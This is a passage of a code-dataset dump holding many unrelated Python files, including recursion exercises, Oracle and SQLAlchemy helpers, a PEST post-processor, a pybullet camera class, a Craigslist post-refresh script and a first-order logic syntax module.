df[\"low\"][i]:\n\t\t\treturn True\n\t\n\t\treturn False\n\n\tdef getBuySignalsList(self):\n\t\tdf = self.df\n\t\tlength = len(df) - 1\n\t\tsignals = []\n\t\tfor i in range(1, length):\n\t\t\tres = self.checkBuySignal(i)\n\t\t\tif res:\n\t\t\t\tsignals.append([df['time'][i], df['close'][i]])\n\n\t\treturn signals\n\n\tdef getSellSignalsList(self):\n\t\tdf = self.df\n\t\tlength = len(df) - 1\n\t\tsignals = []\n\t\tfor i in range(1, length):\n\t\t\tres = self.checkSellSignal(i)\n\t\t\tif res:\n\t\t\t\tsignals.append([df['time'][i], df['close'][i]])\n\n\t\treturn signals","sub_path":"bot/Strategies/AlwaysBuyStrategy.py","file_name":"AlwaysBuyStrategy.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590434522","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. It cannot contain any loops.\n'''\ndef count_th(word):\n \n #base case - word is too short\n if len(word) < 2:\n return 0\n #recursion\n else:\n # if first two characters are 'th'\n if word[:2] == 'th':\n return 1 + count_th(word[2:])\n # move over one character in the word\n # pass the new word back into the function until the word is less than 0\n else:\n return count_th(word[1:])\n","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574844135","text":"#!/usr/bin/env python3\n# -*-coding:utf-8-*-\n\"\"\"Copyright: Copyright (c) 2018 Asiainfo\n @Description: ***oracle数据库的基本面操作***\n @fileName: ora_sql_exec.py\n @version: v1.0.0\n @author: mazhe\n @created on: 2018/11/19 11:57 AM 17:29\n\"\"\"\n\n\ndef sql_dml(sql, db):\n \"\"\"\n @Function: sql_dml\n @Description: 数据增删改操作\n @param:sql 查询sql,db oracle连接\n @return:返回DML row counts\n \"\"\"\n cursor = db.cursor()\n cursor.execute(sql)\n # 获取更改条数\n # effect_num = cursor.getarraydmlrowcounts()\n db.commit()\n cursor.close()\n # return effect_num\n\n\ndef many_insert(table_name, values, db):\n \"\"\"\n :param table_name: 插入数据表\n :param values: 带插入数据列表,list\n :param db: 数据库连接\n :return: 无\n \"\"\"\n if len(values) > 0:\n cursor = db.cursor()\n param = list()\n # 根据查询出数据的字段数,生成绑定变量字符串\n for i in range(0, len(values[0])):\n str_append = \":\" + str(i + 1)\n param.append(str_append)\n bind_str = \",\".join(param)\n sql = \"insert into {0} values ({1})\".format(table_name, bind_str)\n cursor.prepare(sql)\n cursor.executemany(None, values)\n db.commit()\n cursor.close()\n\n\ndef sql_select(sql, db):\n \"\"\"\n @Function: sql_select\n @Description: 通过数据连接查询sql结果\n @param:sql 查询sql,db oracle连接\n @return:返回sql匹配所有结果集\n \"\"\"\n cursor = db.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n cursor.close()\n return result\n","sub_path":"monitor_file_amount_change/ora_sql_exec.py","file_name":"ora_sql_exec.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598574238","text":"a = input(\"Enter a number: \")\nb = input (\"Enter another number: \")\n\na= int(a)\nb= int(b)\n\nif a == b:\n print (\"The numbers are equal!\")\nelif a < b:\n while a <= b:\n if a%2==0:\n print (str(a) + \" - \" + \"even\")\n else:\n print (str(a) + \" - \" + \"odd\")\n a = a + 1\n\nelif a > b:\n while b <= a:\n if b%2 == 0:\n print (str(b) + \" - \" + \"even\")\n \n else:\n print (str(b) + \" - \" + \"odd\")\n b = b + 1\n\n\n","sub_path":"Programming0-1/week1/4-While-Loop_Problems/even_odd_interval.py","file_name":"even_odd_interval.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117447476","text":"import math, re, pandas as pd\n\n# takes float and returs a string in fortran 24.16E+00 notation\ndef f_format(x):\n if x > 0:\n myexp = 10**math.ceil(math.log10(x))\n x_str = '{0:>20.16f}E+{1:02}'.format(x/ myexp, int(math.log10(myexp)))\n if x == 0:\n x_str = ' 0.0000000000000000E+00'\n if x < 0:\n x = abs(x)\n myexp = 10**math.ceil(math.log10(x))\n x_str = '{0:>20.16f}E+{1:02}'.format(-1*x/ myexp, int(math.log10(myexp)))\n return x_str\n\n# make string in format of a row from the Hydraulics Summary\ndef l_hydsum(r):\n l = ''.join([f_format(x) for x in r])\n return l\n\n# read output file and return contents\n# as a string list with rows the lines of the output files\ndef getoutfile(str_file):\n with open(str_file) as f:\n #str_out = f.readlines()\n str_out = f.read().splitlines()\n #str_out = [re.sub('\\\\n$', '', x) for x in str_out]\n return str_out\n\n# gets the rows in the file that are the readers for the output tables\ndef getrows(str_out):\n row_index = [x for x in range(len(str_out)) if '**' in str_out[x]]\n zip(row_index[:-1], [row_index[1:], len(str_out)])\n return row_index\n\n# given the rows of table headers and the content of the out file\n# returns the names of the tables\ndef gettablenames(str_out, rows):\n ts = [str_out[x] for x in rows]\n tx = [re.sub('^( ){1,}|( ){1,}$','',re.sub('(\\\\n){1,}','', re.sub('(\\*){1,}','', x))) for x in ts]\n return tx\n\n## extracts table from output and returns pandas data frame\n# function that breaks string int a list of chunk for a specific width\ndef chunkstring(string, length):\n return [string[0+i:length+i] for i in range(0, len(string), length)]\n\n# gets the column names from the output table\ndef getheader(str_out, str_tab, dict_info):\n rs = dict_info.get(str_tab)\n str_raw = str_out[rs[0]]\n str_list = chunkstring(str_raw, 24)\n header = [re.sub('^( ){1,}|( ){1,}$', '', x) for x in str_list]\n return header\n\n# get the units\ndef getunits(str_out, str_tab, dict_info):\n rs = dict_info.get(str_tab)\n str_raw = str_out[rs[0] + 1] # units are the line below the column names\n str_list = chunkstring(str_raw, 24)\n str_units = [re.sub('^( ){1,}|( ){1,}$', '', x) for x in str_list]\n return str_units\n\n# get the values from the output table\ndef extraxtvals(str_out, str_tab, dict_info):\n rs = dict_info.get(str_tab)\n r = 2 # row the values start at in table\n if 'Diel' in str_tab:\n r = 3 # there is an extra row above values for diel tables\n str_sub = str_out[(rs[0]+r):rs[1]]\n data_blk = makeblk(str_sub)\n return data_blk\n\n# takes row from output tables values and parses into list using\n# fixed length of columns\n# used in makeblk function\ndef get_row_fix(r, length):\n row_raw = chunkstring(r, length)\n rout = [re.sub('^( ){1,}|( ){1,}$','',x) for x in row_raw]\n return rout\n\n# makes a data block of values from output table\ndef makeblk(str_vals):\n data_blk = [get_row_fix(str_vals[x], 24) for x in range(len(str_vals))]\n return data_blk\n\n# makes a pandas data frame from a table in output\ndef makedf(str_out, str_tab, dict_info):\n col_names = getheader(str_out, str_tab, dict_info)\n units = getunits(str_out, str_tab, dict_info)\n data_blk = extraxtvals(str_out, str_tab, dict_info)\n df_raw = pd.DataFrame.from_records(data_blk,columns = col_names)\n df = df_raw.apply(pd.to_numeric, errors = 'ignore')\n return df\n\n# creates a dictionary fo table names as kets and the starting and\n# ending rows of each table\ndef makedicttable(tab_names, tab_rows, n_rows):\n tab_str = [x + 1 for x in tab_rows]\n tab_end = [x - 1 for x in tab_rows[1:]]\n tab_end.append(n_rows)\n dic_tab_names = dict(zip(tab_names, zip(tab_str, tab_end)))\n return dic_tab_names\n\n# aggregates time-series by the hour using min, mean, and max functions\ndef tsagg(df, wq_par):\n df['Hour'] = df['Time'].astype(int)\n df['Hour'] = df['Hour'].astype(str)\n df['Hour'] = df['Hour'].astype(int)\n agg_funcs = dict(Min='min', Ave='mean', Max='max')\n df_agg = df.groupby(['Reach', 'Hour'])[wq_par].agg(agg_funcs)\n df_agg.reset_index(inplace=True)\n return df_agg\n\n# reads the model.ins file to get the obs names, formart, and -1 for vals in a data frame\ndef get_modelin(fn):\n d = {} # dictionary containing the obs name and the boundaries in the line\n with open(fn) as f:\n next(f) # skip the first line because it's not necessary for this action\n for line in f:\n (key, val) = re.sub('(^.*\\[)|( .*$\\n)','', line).split(']') # mung the line and retirn ons name and boundaries\n d[key] = val\n df = pd.DataFrame(d.items(), columns=('Name','cols')) # make data frame from dictionary\n df['vals'] = -1.0 # add col for vals with defaults of -1.0\n df['cols'] = df['cols'].str.strip() # get rid of any whitespaces that could have snuck in\n return(df)\n\n## gets value from aggregated dataframe for the reach, hour, and stat of the cur obs name from df_ins\ndef get_value(cur, df_agg):\n val = float(df_agg[(df_agg['Reach'] == int(cur[-4:-2])) & (df_agg['Hour'] == int(cur[-2:]))][cur[-7:-4].title()])\n return(val)\n\n## prints number in E to width defined by column boundaries\ndef print_num(cols, num):\n out = '{:+.{prec}E}'.format(num, prec=cols[1] - cols[0] - 7)\n return(out)\n\n## takes row from df_ins and creates line for model.out file\n## input cur must be a row from df_ins data frame\ndef create_ln(cur):\n cols = list(map(int, str(cur['cols']).split(':')))\n num = cur['vals']\n name = str(cur['Name'])\n sps = cols[0] - len(name)\n ln = name + ''.ljust(sps, ' ') + print_num(cols, num)\n return(ln)\n\n","sub_path":"Postprocess_for_PEST/Postprocess_for_PEST.py","file_name":"Postprocess_for_PEST.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282067660","text":"import numpy as np\nimport matplotlib.pyplot as plt\nclass Loadrawdata_show_train():## Load data\n #read raw data from files\n def load(self,filename):\n fread = open(filename, 'r', encoding='utf8')\n freport = open(\"logs/report.txt\", \"a\", encoding=\"utf8\")\n fword = open('Raw_Data/words.txt', 'w', encoding='utf8')\n ftags = open('Raw_Data/tags.txt', 'w', encoding='utf8')\n fsentence = open('Raw_Data/sentences.txt', 'w', encoding='utf8')\n creating_sent = []\n self.words = []\n self.tags = []\n self.sentence = []\n len_word=0\n len_sentence=0\n t=()\n end_of_line=[\".\",\"؟\",\"؛\",\"!\"]\n for line in fread:\n if line=='\\n':\n pass\n else:\n line = line.replace(\"\\n\", \"\")\n line = line.replace(u'\\ufeff', \"\")\n line = line.replace(u'\\u200c', \"\")\n line = line.replace(u'\\u200e', \"\")\n line = line.replace(u'\\u200f\\\\', \"\")\n line = line.replace(u'\\u200f', \"\")\n data = line.split()\n self.words.append(data[0])\n len_word+=len(data[0])\n try:\n self.tags.append(data[1])\n except Exception as err:\n print(line)\n if data[0] not in end_of_line:\n #print(data)\n tuplex=(data[0],data[1])\n creating_sent.append(tuplex)\n else:\n tuplex = (data[0], data[1])\n creating_sent.append(tuplex)\n len_sentence+=len(creating_sent)\n self.sentence.append(creating_sent)\n creating_sent = []\n n_sentence=len(self.sentence)\n freport.write(\"all_word---------\" + str(len_word) + \"\\n\")\n freport.write(\"all_sentence---------\" + str(len_sentence) + \"\\n\")\n freport.write(\"n_sentence---------\" + str(n_sentence) + \"\\n\")\n self.unic_words = list(dict.fromkeys(self.words))\n self.uniq_tags=list(dict.fromkeys(self.tags))\n self.n_words=len(self.unic_words)\n fword.write(str(self.unic_words))\n self.n_tags=len(self.uniq_tags)\n ftags.write(str(self.uniq_tags))\n fsentence.write(str(self.sentence))\n print(\"len words are: \"+str(self.n_words))\n print(\"len tags are: \" + str(self.n_tags))\n #show histogram of sentences\n plt.hist([len(sen) for sen in self.sentence])\n plt.savefig('Raw_Data/hist.png')\n plt.show()\n\n\n return self.sentence,self.unic_words,self.uniq_tags,self.n_words,self.n_tags","sub_path":"Loadrawdata_show_2.py","file_name":"Loadrawdata_show_2.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360272820","text":"import os\nimport sys\n\nsys.path.append(os.path.join(sys.path[0],\"helpers\"))\n\nnats_server_address = os.environ['NATS_URL']\nnats_server_channel = os.environ['NATS_CLUSTER_NAME']\n\nfrom helpers.Nats import NatsService\n\ntry:\n print(\"starting nats service instance\")\n ns = NatsService(nats_server_address, nats_server_channel)\n print(\"listening for approved message\")\n ns.start_listening()\nexcept Exception as e:\n print(f\"Error: {e}\")\n\n","sub_path":"src/trends.py","file_name":"trends.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"351136309","text":"from Node import Node\n\n\ndef kth_to_last_node(k, head):\n if k < 1:\n raise Exception(\"ValueError\")\n current_node = head\n length = 0\n while current_node:\n current_node = current_node.next\n length += 1\n if k > length:\n raise Exception(\"k is greater than linked list\")\n how_far = length - k\n print(how_far)\n current_node = head\n for _ in range(how_far):\n current_node = current_node.next\n print(current_node.value)\n\n\ndef kth_to_last_node_second_approach(k, head):\n if k < 1:\n raise Exception(\"ValueError\")\n right_node = head\n left_node = head\n for _ in range(k - 1):\n if not right_node.next:\n raise Exception(\"k is greater than linked list\")\n right_node = right_node.next\n while right_node.next:\n right_node = right_node.next\n left_node = left_node.next\n print(left_node.value)\n\n\na = Node(1)\nb = Node(2)\nc = Node(3)\nd = Node(4)\na.next = b\nb.next = c\nc.next = d\nkth_to_last_node(1, a)\nkth_to_last_node_second_approach(1, a)\n","sub_path":"KthNodeFromLast.py","file_name":"KthNodeFromLast.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"419142231","text":"from sqlalchemy import create_engine\nfrom sqlalchemy import Integer, String, MetaData, Table, Column, ForeignKey\nfrom sqlalchemy.sql import select\n\nengine = create_engine(\"mysql+pymysql://elko:elko@10.10.64.201/elko\", echo=True)\n\nmeta = MetaData()\nmeta.create_all(engine)\n\n\nparent = Table(\n 'parent',\n meta,\n Column('parent_id',Integer, primary_key=True),\n\n)\n\nchild = Table(\n 'child',\n meta,\n Column('child_id',Integer, primary_key=True),\n Column('parent_fk', Integer, ForeignKey('parent.parent_id') ),\n\n)\n\nmeta.create_all(engine)\n\n# insert parent+child\n\n# update child\n\n# delete parent\n\n\n# JOIN\njoin = parent.join(child, parent.c.parent_id == child.c.parent_fk)\n\nquery = select( [ parent, child.c.parent_fk ] ).select_from(join)\n\nconnection = engine.connect()\n\nrows = connection.execute(query)\n\nfor row in rows:\n print(row)\n","sub_path":"orm_foreign_key.py","file_name":"orm_foreign_key.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461927216","text":"import sys\n\nfrom clauth import login_to_account\nfrom wdtools import *\nfrom paths import *\n\n# bookshelf\nfrom reporter import Reporter\nfrom poster import Poster\nimport time\n\nfrom threading import Thread\n\nclass RefreshThread(Thread):\n def __init__(self, p, threadNo):\n Thread.__init__(self)\n self.postCollection = p\n self.threadNo = threadNo\n\n def run(self):\n p = Poster()\n p.refresh_collection(self.postCollection, threadNo=self.threadNo)\n\n\n# ===== RUN, FOREST, RUN! =====\ndef main(argv):\n datetime = time.localtime()\n months = { 1 : \"January\",\n 2 : \"February\",\n 3 : \"March\",\n 4 : \"April\",\n 5 : \"May\",\n 6 : \"June\",\n 7 : \"July\",\n 8 : \"August\",\n 9 : \"September\",\n 10 : \"October\",\n 11 : \"November\",\n 12 : \"December\"}\n\n tm_hour = datetime.tm_hour\n tm_min = datetime.tm_min\n tm_ampm = \"am\"\n if tm_hour > 12:\n tm_hour = tm_hour - 12\n tm_ampm = \"pm\"\n if tm_hour< 10:\n tm_hour = \"0\" + str(tm_hour)\n if tm_min < 10:\n tm_min = \"0\" + str(tm_min)\n tm_hour = str(tm_hour)\n tm_min = str(tm_min)\n\n\n print(\"Craigslist Refresh | \" + str(months[datetime.tm_mon]) + \" \"\n + str(datetime.tm_mday) + \", \" + str(datetime.tm_year) + \" | \"\n + tm_hour + \":\" + tm_min + \" \" + tm_ampm )\n\n\n postCollection = []\n threads = []\n\n print(\"Gathering postID data....\")\n pages = [1,2,3]\n numThreads = 3\n driver = login_to_account(\"http://www.google.com\")\n for pageNumber in pages:\n driver.get(urlPaths[\"url_AccountActive\"+str(pageNumber)])\n postCollection = postCollection + collect_post_ids(driver)\n print(\"Page \"+ str(pageNumber) + \\\n \" :: Collected \" + str(len(postCollection)) + \" posting IDs : \")\n\n print(\"Collected IDs :: \")\n print_posts(postCollection, printNumbers = True)\n driver.quit()\n\n postPartitions = partition_collection(postCollection, numThreads)\n for idx, part in enumerate(postPartitions):\n print(\"===============================================================\")\n print(\"Parition \" + str(idx) + \" :: size(\"+str(len(part))+\")\")\n print_posts(part)\n\n threads.append(RefreshThread(part, idx+1))\n print(\"=============================================================\")\n\n for t in threads:\n t.start()\n time.sleep(15)\n\n for t in threads:\n t.join()\n\n return 0\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"src/app_clrefreshthreaded.py","file_name":"app_clrefreshthreaded.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"191628779","text":"import unittest\n\nimport numpy as np\n\nfrom mars.executor import Executor\nimport mars.tensor as mt\n\n\nclass Test(unittest.TestCase):\n def setUp(self):\n self.executor = Executor('jax')\n\n def testUnaryExecution(self):\n executor_numpy = Executor('numpy')\n a = mt.ones((2, 2))\n a = a * (-1)\n c = mt.abs(a)\n d = mt.abs(c)\n e = mt.abs(d)\n f = mt.abs(e)\n result = self.executor.execute_tensor(f, concat=True)\n expected = executor_numpy.execute_tensor(f, concat=True)\n np.testing.assert_equal(result, expected)\n","sub_path":"mars/tensor/fuse/tests/test_jax_execute.py","file_name":"test_jax_execute.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611927740","text":"from queue import Queue\nimport unittest\n\nqueue = Queue(10)\nqueue1 = Queue(2)\nqueue2 = Queue(2)\n\nqueue2.put(2)\nqueue2.put(2)\n\nclass QueueTest(unittest.TestCase):\n\n def test_get(self):\n with self.assertRaises(IndexError):\n queue.get()\n queue.put(4)\n queue.put(3)\n queue.put(5)\n self.assertEqual(queue.get(), 4)\n self.assertEqual(queue.get(), 3)\n self.assertEqual(queue.get(), 5)\n\n def test_put(self):\n with self.assertRaises(IndexError):\n queue1.put(1)\n queue1.put(3)\n queue1.put(4)\n\n def test_is_full(self):\n self.assertEqual(queue2.is_full(), True)\n self.assertEqual(queue.is_full(), False)\n\n def test_is_empty(self):\n self.assertEqual(queue2.is_empty(), False)\n self.assertEqual(queue1.is_empty(), True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Zadania_10/10.4.py","file_name":"10.4.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"485980703","text":"\n#approximate cube root using binary search\nx = int(input(\"enter a perfect cube: \"))\n\n#allowable error\nepsilon = 0.01\nnumGuesses = 0;\n\nlow = 0.0\nhigh = x\n\nans = (high + low)/3.0\n\nwhile abs(ans**3 - x) >= epsilon and ans <=x:\n numGuesses += 1;\n if ans**3 < x:\n low = ans\n else:\n high = ans\n ans = (high + low)/2.0\nprint(str(ans) + \" is the approxiamte cube root of \" + str(x))\nprint(\"took \" + str(numGuesses) + \" guesses\")\n","sub_path":"lecture3/cube_root5.py","file_name":"cube_root5.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"110880222","text":"import numpy as np\nimport pybullet as pb\n\n\nclass Camera(object):\n def __init__(self, width, height, client_id):\n shape = (height, width)\n self._shape = shape\n self._world_pos = None\n self._proj_mat = None\n self._view_mat = None\n self._attach_link = None\n self._attach_pose = None\n self._render_options = {}\n self._render_flags = 0\n self._rgba = np.zeros(shape + (4, ), dtype=np.uint8)\n self._mask = np.zeros(shape, dtype=np.uint8)\n self._depth = np.zeros(shape, dtype=np.float32)\n self.avg_fps = []\n self.client_id = client_id\n self.infos = {}\n\n def project(self, fov, near, far):\n \"\"\" Apply camera projection matrix.\n Args:\n fov (float): Field of view.\n near float): Near plane distance.\n far (float): Far plane distance.\n \"\"\"\n h, w = self.shape\n self._near_proj = near\n self._far_proj = far\n self._proj_mat = pb.computeProjectionMatrixFOV(\n fov=fov,\n aspect=w / h,\n nearVal=near,\n farVal=far,\n physicsClientId=self.client_id)\n\n self.infos.update(dict(\n fov=float(fov),\n aspect = w/h,\n near=near,\n far=far))\n\n def move_to(self, pos, orn):\n \"\"\" Move camera to a specified position in space.\n Args:\n pos (vec3): Camera eye position in Cartesian world coordinates.\n orn (vec4): Camera orientation, quaternion.\n \"\"\"\n if len(orn) == 3:\n orn = pb.getQuaternionFromEuler(orn)\n mat = pb.getMatrixFromQuaternion(orn)\n else:\n mat = pb.getMatrixFromQuaternion(orn)\n x, y, z = np.array(mat).reshape((3, 3)).T\n self._view_mat = pb.computeViewMatrix(\n cameraEyePosition=pos,\n cameraTargetPosition=pos + z,\n cameraUpVector=y,\n physicsClientId=self.client_id)\n\n def view_at(self, target, distance, yaw, pitch, roll=0., up='z'):\n \"\"\" Move camera to a specified position in space.\n Args:\n target (vec3): Target focus point in Cartesian world coordinates.\n distance (float): Distance from eye to focus point.\n yaw (float): Yaw angle in degrees left / right around up-axis.\n pitch (float): Pitch in degrees up / down.\n roll (float): Roll in degrees around forward vector.\n up (char): Axis up, one of x, y, z.\n \"\"\"\n self._view_mat = pb.computeViewMatrixFromYawPitchRoll(\n target,\n distance,\n yaw,\n pitch,\n roll,\n 'xyz'.index(up),\n physicsClientId=self.client_id)\n\n self.infos.update(dict(\n target=tuple(target),\n distance=float(distance),\n yaw=float(yaw),\n pitch=float(pitch),\n roll=float(roll)))\n\n def attach(self, link, pos=(0, 0, 0), orn=(0, 0, 0, 1)):\n \"\"\" Attach camera to a link in a specified position.\n Args:\n link (Link): Link to attach.\n pos (vec3): Camera eye position in link coord system.\n orn (vec4): Camera orientation.\n \"\"\"\n if len(orn) == 3:\n orn = pb.getQuaternionFromEuler(orn)\n self._attach_link = link\n self._attach_pose = pos, orn\n\n def shot(self):\n \"\"\" Computes a RGB image, a depth buffer and a segmentation mask buffer\n with body unique ids of visible objects for each pixel.\n \"\"\"\n\n h, w = self._shape\n renderer = pb.ER_BULLET_HARDWARE_OPENGL\n\n if self._attach_link is not None:\n pos, orn = self._attach_link.state.position\n pos, orn = pb.multiplyTransforms(\n pos, orn, physicsClientId=self.client_id, **self._attach_pose)\n self.move_to(pos, orn)\n\n w, h, rgba, depth, mask = pb.getCameraImage(\n width=w,\n height=h,\n projectionMatrix=self._proj_mat,\n viewMatrix=self._view_mat,\n renderer=renderer,\n flags=self._render_flags,\n lightDirection=(2, 0, 1),\n lightColor=(1, 1, 1),\n shadow=0,\n physicsClientId=self.client_id,\n **self._render_options)\n\n if not isinstance(rgba, np.ndarray):\n rgba = np.array(rgba, dtype=np.uint8).reshape((h, w, 4))\n depth = np.array(depth, dtype=np.float32).reshape((h, w))\n mask = np.array(mask, dtype=np.uint8).reshape((h, w))\n\n self._rgba, self._depth, self._mask = rgba, depth, mask\n # print('cam', sum(self.avg_fps)/len(self.avg_fps))\n\n @property\n def shape(self):\n \"\"\" Width and height tuple. \"\"\"\n return self._shape\n\n @property\n def mask(self):\n \"\"\" For each pixels the visible object unique id (int).\n (!) Only available when using software renderer. \"\"\"\n return self._mask\n\n @property\n def rgba(self):\n \"\"\" List of pixel colors in R,G,B,A format, in range char(0..255)\n for each color. \"\"\"\n return self._rgba\n\n @property\n def rgb(self):\n \"\"\" List of pixel colors in R,G,B format, in range char(0..255)\n for each color. \"\"\"\n return self._rgba[:, :, :3]\n\n @property\n def gray(self):\n \"\"\" List of pixel grayscales, in range char(0..255). \"\"\"\n return np.dot(self.rgb, [0.299, 0.587, 0.114]).astype(np.uint8)\n\n @property\n def depth(self):\n \"\"\" Depth buffer, list of floats. \"\"\"\n near = self._near_proj\n far = self._far_proj # Camera near, far\n metric_depth = far * near / (far - (far - near) * self._depth)\n return metric_depth\n\n def depth_uint8(self, kn, kf):\n \"\"\" Depth buffer converted to range char(0..255). \"\"\"\n # kn = 0.35 # Realsense near\n # kf = 1.55 # Realsense far\n # kn = 0.5 # kinect1 near\n # kf = 1.8 # kinect1 far\n # kn is the camera (originally Kinect) near\n # kf is the camera (originally Kinect) far\n metric_depth = self.depth\n metric_depth[metric_depth <= kn] = kf\n kinect_depth = np.clip(metric_depth, kn, kf)\n kinect_depth = (255 * (metric_depth - kn) / (kf - kn)).astype(np.uint8)\n return kinect_depth.astype(np.uint8)\n\n def mask_link_index(self, flag):\n \"\"\" If is enabled, the mask combines the object unique id and link index\n as follows: value = objectUniqueId + (linkIndex+1)<<24.\n \"\"\"\n if flag:\n self._render_flags |= pb.ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX\n else:\n self._render_flags &= ~pb.ER_SEGMENTATION_MASK_OBJECT_AND_LINKINDEX\n\n def casts_shadow(self, flag):\n \"\"\" 1 for shadows, 0 for no shadows. \"\"\"\n self._render_options['shadow'] = 1 if flag else 0\n\n def set_light_direction(self, vec3):\n \"\"\" Light direction. \"\"\"\n self._render_options['lightDirection'] = vec3\n\n def set_light_color(self, vec3):\n \"\"\" Directional light color in [RED, GREEN, BLUE] in range 0..1. \"\"\"\n self._render_options['lightColor'] = vec3\n\n def set_light_distance(self, value):\n \"\"\" Distance of the light along the normalized light direction. \"\"\"\n self._render_options['lightDistance'] = value\n\n def set_light_ambient_coeff(self, valuem):\n \"\"\" Light ambient coefficient. \"\"\"\n self._render_options['lightAmbientCoeff'] = value\n\n def set_light_diffuse_coeff(self, value):\n \"\"\" Light diffuse coefficient. \"\"\"\n self._render_options['lightDiffuseCoeff'] = value\n\n def set_light_specular_coeff(self, value):\n \"\"\" Light specular coefficient. \"\"\"\n self._render_options['lightSpecularCoeff'] = value\n\n\nclass DebugCamera(object):\n @staticmethod\n def view_at(target, distance, yaw, pitch):\n \"\"\"\n Reset the 3D OpenGL debug visualizer camera.\n Args:\n target (vec3): Target focus point in Cartesian world coordinates.\n distance (float): Distance from eye to focus point.\n yaw (float): Yaw angle in degrees left / right around up-axis.\n pitch (float): Pitch in degrees up / down.\n \"\"\"\n pb.resetDebugVisualizerCamera(\n cameraTargetPosition=target,\n cameraDistance=distance,\n cameraYaw=yaw,\n cameraPitch=pitch)\n\n @staticmethod\n def get_position():\n \"\"\"\n Get position of the 3D OpenGL debug visualizer camera.\n Outputs:\n target (vec3): Target focus point in Cartesian world coordinates.\n distance (float): Distance from eye to focus point.\n yaw (float): Yaw angle in degrees left / right around up-axis.\n pitch (float): Pitch in degrees up / down.\n \"\"\"\n data = pb.getDebugVisualizerCamera()\n yaw = data[8]\n pitch = data[9]\n distance = data[10]\n target = data[11]\n return target, distance, yaw, pitch\n\n\nclass VRCamera(object):\n _pos = (0, 0, 0)\n _orn = (0, 0, 0, 1)\n\n @staticmethod\n def move_to(pos, orn):\n \"\"\"\n Move the VR camera to specified position.\n Args:\n pos (vec3): Camera eye position in default coord system.\n orn (vec4): Camera orientation (quaternion or Euler angles).\n \"\"\"\n if len(orn) == 3:\n orn = pb.getQuaternionFromEuler(orn)\n pb.setVRCameraState(rootPosition=pos, rootOrientation=orn)\n\n @staticmethod\n def move_step(pos, orn=(0, 0, 0, 1)):\n \"\"\"\n Move the VR camera by step.\n Args:\n pos (vec3): Linear step.\n orn (vec4): Angular (quaternion or Euler angles).\n \"\"\"\n if len(orn) == 3:\n orn = pb.getQuaternionFromEuler(orn)\n pos = np.add(VRCamera._pos, pos)\n _, orn = pb.multiplyTransforms((0, 0, 0), VRCamera._orn, (0, 0, 0),\n orn)\n VRCamera.move_to(pos, orn)\n","sub_path":"mime/scene/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":10127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"486145380","text":"# (c) This file is part of the course\n# Mathematical Logic through Programming\n# by Gonczarowski and Nisan.\n# File name: predicates/syntax.py\n\n\"\"\"Syntactic handling of first-order formulas and terms.\"\"\"\n\nfrom __future__ import annotations\n\nfrom copy import deepcopy\nfrom typing import AbstractSet, Mapping, Optional, Sequence, Set, Tuple, Union\n\nfrom logic_utils import fresh_variable_name_generator, frozen\n\nfrom propositions.syntax import Formula as PropositionalFormula, \\\n is_variable as is_propositional_variable\nimport re\n\n\nclass ForbiddenVariableError(Exception):\n \"\"\"Raised by `Term.substitute` and `Formula.substitute` when a substituted\n term contains a variable name that is forbidden in that context.\"\"\"\n\n def __init__(self, variable_name: str) -> None:\n \"\"\"Initializes a `ForbiddenVariableError` from its offending variable\n name.\n\n Parameters:\n variable_name: variable name that is forbidden in the context in\n which a term containing it was to be substituted.\n \"\"\"\n assert is_variable(variable_name)\n self.variable_name = variable_name\n\n\ndef is_constant(s: str) -> bool:\n \"\"\"Checks if the given string is a constant name.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a constant name, ``False`` otherwise.\n \"\"\"\n return (((s[0] >= '0' and s[0] <= '9') or (s[0] >= 'a' and s[0] <= 'd'))\n and s.isalnum()) or s == '_'\n\n\ndef is_variable(s: str) -> bool:\n \"\"\"Checks if the given string is a variable name.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a variable name, ``False`` otherwise.\n \"\"\"\n return s[0] >= 'u' and s[0] <= 'z' and s.isalnum()\n\n\ndef is_function(s: str) -> bool:\n \"\"\"Checks if the given string is a function name.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a function name, ``False`` otherwise.\n \"\"\"\n return s[0] >= 'f' and s[0] 